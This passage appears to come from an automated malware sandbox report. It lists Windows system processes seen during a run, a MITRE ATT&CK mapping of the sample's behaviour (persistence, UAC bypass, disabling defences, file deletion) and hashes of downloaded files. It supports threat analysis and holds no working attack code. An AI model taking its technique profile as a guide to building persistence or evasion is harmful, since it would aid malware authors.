C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:9272
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6964 -ip 69641⤵PID:11824
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59a56e858c6188d5fce23f8dd4f8483f9
SHA151671c792d7efcfd0a94cc4a60245bc0a413a517
SHA2562d6214ba03c8e1f1abe9939e6f5d0cd36bb8af05544b5013706388792c7f09a1
SHA5121e06f4239976d9a21caa28fbb328b30bdc81054eca47c331b8e665aafb55ee27f3a589c3ce49208f5ba88a3750ede142761585ee0eb05399fe1c4f431a99deb0
-
Filesize
12KB
MD5347f421896e6f46cd10770304cc675cb
SHA1f9ee60e374f2d0f111a9504e8b0da85c41366024
SHA25629c472b3ca758713bed732c100da13ccf84d30ac8e45cb56128a7aab6af9a34c
SHA5124efb33462abdfc3ec3898ccde32e7c4923574c9b45c645852a33a9197bb513dcc3dc0cc98f369f788eed70bbea1f55a841b8a47e1f651d5e3e121f08cfde57bb
-
Filesize
684B
MD523668b4154eb92ec1b6c102d5ae4a2a7
SHA110f1fa4f805e886354a5ece322aac1161c2e71e4
SHA256d1ac62e474bdd4c13682ec869ec9745cdeaea17eaad958b3d4938228417fc220
SHA512935e177a07f1e8218a4a52453b3c50c2b01fa4c71341a1cc2b7e5cf3b1c156bad74364b8ce6b0683f1e02b829284fa953427ab42f56dee6405e31c7389768e61